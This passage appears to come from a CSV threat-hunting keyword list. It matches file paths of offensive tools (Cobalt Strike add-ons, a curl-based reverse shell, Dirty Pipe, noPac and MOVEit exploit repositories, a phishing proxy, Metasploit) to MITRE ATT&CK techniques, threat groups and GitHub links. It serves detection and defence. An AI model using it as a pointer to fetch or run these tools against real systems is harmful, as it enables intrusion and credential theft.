anti-killing including python version and C version,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Gality369/CS-Loader,1,1,N/A,10,10,751,149,2021-08-11T06:43:52Z,2020-08-17T21:33:06Z -*/csOnvps/*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*/csOnvps/*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*/cs-rdll-ipc-example/*,offensive_tool_keyword,cobaltstrike,Example code for using named pipe output with beacon ReflectiveDLLs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rxwx/cs-rdll-ipc-example,1,1,N/A,10,10,101,24,2020-06-24T19:47:35Z,2020-06-24T19:43:56Z -*/CS-Remote-OPs-BOF*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*/cs-token-vault/*,offensive_tool_keyword,cobaltstrike,In-memory token vault BOF for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Henkru/cs-token-vault,1,1,N/A,10,10,128,25,2022-08-18T11:02:42Z,2022-07-29T17:50:10Z -*/cube0x0/noPac*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078 - T1078.002,TA0003 - TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/cube0x0/noPac,1,1,N/A,N/A,10,1259,318,2021-12-16T09:50:15Z,2021-12-11T19:27:30Z -*/cuddlephish.git*,offensive_tool_keyword,cuddlephish,Weaponized Browser-in-the-Middle (BitM) for Penetration Testers,T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001,TA0009 - TA0006,N/A,N/A,Sniffing & Spoofing,https://github.com/fkasler/cuddlephish,1,1,N/A,10,2,152,10,2023-09-06T12:25:08Z,2023-08-02T14:30:41Z -*/cuddlephish.html*,offensive_tool_keyword,cuddlephish,Weaponized Browser-in-the-Middle (BitM) for Penetration Testers,T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001,TA0009 - TA0006,N/A,N/A,Sniffing & Spoofing,https://github.com/fkasler/cuddlephish,1,1,N/A,10,2,152,10,2023-09-06T12:25:08Z,2023-08-02T14:30:41Z -*/cups-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/cups-queue-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/curl.cna,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*/curl.x64.o,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*/curl.x86.o,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*/curlshell.git*,offensive_tool_keyword,curlshell,reverse shell using curl,T1105 - T1059.004 - T1140,TA0011 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/irsl/curlshell,1,1,N/A,10,10,269,28,2023-09-29T08:31:47Z,2023-07-13T19:38:34Z -*/custom_payload_generator/*,offensive_tool_keyword,cobaltstrike,Various Aggressor Scripts I've Created.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/offsecginger/AggressorScripts,1,1,N/A,10,10,141,31,2022-01-01T19:04:27Z,2018-11-30T03:14:45Z -*/customPayload/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/CVE-*-*_POC.py*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,0,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*/CVE-*.bin,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/CVE-*.jar,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/CVE*/chocobo_root*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/cve*/exploit.go*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,1,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*/CVE-*_EXPLOIT_0DAY/*,offensive_tool_keyword,poc,Exploit for the CVE-2023-23399,T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550,TA0003 - TA0002 - TA0004,N/A,N/A,Exploitation tools,https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY,1,1,N/A,N/A,2,158,46,2023-03-15T17:53:53Z,2023-03-15T17:03:38Z -*/CVE-*x64.exe,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/CVE-*x86.exe,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/CVE-2009-2698/katon.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/CVE-2022-*.git*,offensive_tool_keyword,POC,POC exploit pattern from github,T1203 - T1218 - T1059 - T1064 - T1204,TA0001 - TA0002,N/A,N/A,Exploitation tools,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/CVE-2022-*.go*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,0,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*/CVE-2022-0847.c*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047,TA0001 - TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/4luc4rdr5290/CVE-2022-0847,1,1,N/A,N/A,1,1,2,2022-03-08T20:41:15Z,2022-03-08T20:18:28Z -*/CVE-2022-0847/write_anything.c*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0008,N/A,N/A,Exploitation tools,https://github.com/gyaansastra/CVE-2022-0847,1,1,N/A,N/A,1,1,2,2022-03-20T15:46:04Z,2022-03-09T15:44:58Z -*/CVE-2022-0847-dirty-pipe-checker*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker,1,1,N/A,N/A,1,55,28,2023-06-14T23:25:46Z,2022-03-08T17:13:24Z -*/CVE-2022-0847-DirtyPipe-Exploit*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit,1,1,N/A,N/A,10,1057,223,2022-03-08T06:20:05Z,2022-03-07T18:55:20Z -*/CVE-2022-0847-dirty-pipe-exploit*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit,1,1,N/A,N/A,1,2,3,2022-03-08T11:15:00Z,2022-03-08T10:40:07Z -*/CVE-2022-0847-Docker*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/mrchucu1/CVE-2022-0847-Docker,1,1,N/A,N/A,1,0,1,2022-03-08T17:05:01Z,2022-03-08T17:02:40Z -*/cve-2022-23131-exp/blob/main/zabbix.py*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0003 - TA0002,N/A,N/A,Exploitation tools,https://github.com/random-robbie/cve-2022-23131-exp,1,1,N/A,N/A,1,8,7,2022-02-23T16:37:13Z,2022-02-23T16:34:03Z -*/CVE-2022-26809-RCE*,offensive_tool_keyword,POC,Remote Code Execution Exploit in the RPC Library CVE-2022-26809,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/websecnl/CVE-2022-26809,1,1,N/A,N/A,1,29,6,2022-04-19T17:04:04Z,2022-04-14T08:12:24Z -*/CVE-2023-*.git*,offensive_tool_keyword,POC,POC exploit pattern from github,T1203 - T1218 - T1059 - T1064 - T1204,TA0001 - TA0002,N/A,N/A,Exploitation tools,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/CVE-2023-34362.git*,offensive_tool_keyword,POC,CVE-2023-34362: MOVEit Transfer Unauthenticated RCE,T1190.001 - T1210.002 - T1068 - T1059.001 - T1059.003,TA0005 - TA0001 - TA0002 - TA0043,N/A,N/A,Exploitation tools,https://github.com/sfewer-r7/CVE-2023-34362,1,1,N/A,N/A,1,62,24,2023-06-13T08:46:03Z,2023-06-12T12:56:12Z -*/CVE-2023-38831-RaRCE*,offensive_tool_keyword,RaRCE,An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23,T1068 - T1203 - T1059.003,TA0001 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/ignis-sec/CVE-2023-38831-RaRCE,1,1,N/A,9,2,108,18,2023-08-27T22:17:56Z,2023-08-27T21:49:37Z -*/cvs-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/cvs-brute-repository.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/CWoNaJLBo/VTNeWw11212/*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/CWoNaJLBo/VTNeWw11213/*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 